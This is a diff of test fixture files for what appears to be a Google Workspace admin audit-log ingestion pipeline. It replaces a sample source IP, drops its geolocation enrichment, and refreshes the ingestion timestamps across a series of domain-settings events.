"google_workspace": { 
@@ -2500,35 +1960,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091283700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915910500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_CUSTOM_LOGO", "id": "1", @@ -2558,7 +2000,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2580,35 +2022,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091286400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.915915800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA", "id": "1", @@ -2638,7 +2062,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2660,35 +2084,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091289100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.915920600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_SETTING", "id": "1", @@ -2719,7 +2125,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2741,35 +2147,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091291700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", + "ingested": "2021-12-09T13:38:31.915924200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", "provider": "admin", "action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO", "id": "1", @@ -2799,7 +2187,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2823,35 +2211,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091294800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", + "ingested": "2021-12-09T13:38:31.915928800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "DELETE_PLAY_FOR_WORK_TOKEN", "id": "1", @@ -2881,7 +2251,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2905,35 +2275,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091311Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915933200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VIEW_DNS_LOGIN_DETAILS", "id": "1", @@ -2963,7 +2315,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2987,35 +2339,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091315500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915938Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_LOCALE", "id": "1", @@ -3045,7 +2379,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -3069,35 +2403,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091330700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915942500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE", "id": "1", @@ -3127,7 +2443,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -3151,35 +2467,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091336300Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915946900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_NAME",
 "id": "1",
@@ -3209,7 +2507,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3233,35 +2531,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091350700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915950700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES",
 "id": "1",
@@ -3291,7 +2571,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3315,35 +2595,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091355700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915954800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_SUPPORT_MESSAGE",
 "id": "1",
@@ -3373,7 +2635,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3397,35 +2659,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091359Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915959500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "ADD_TRUSTED_DOMAINS",
 "id": "1",
@@ -3455,7 +2699,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3479,35 +2723,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091362200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915963600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "REMOVE_TRUSTED_DOMAINS",
 "id": "1",
@@ -3537,7 +2763,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3561,35 +2787,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091365100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915968700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_EDU_TYPE",
 "id": "1",
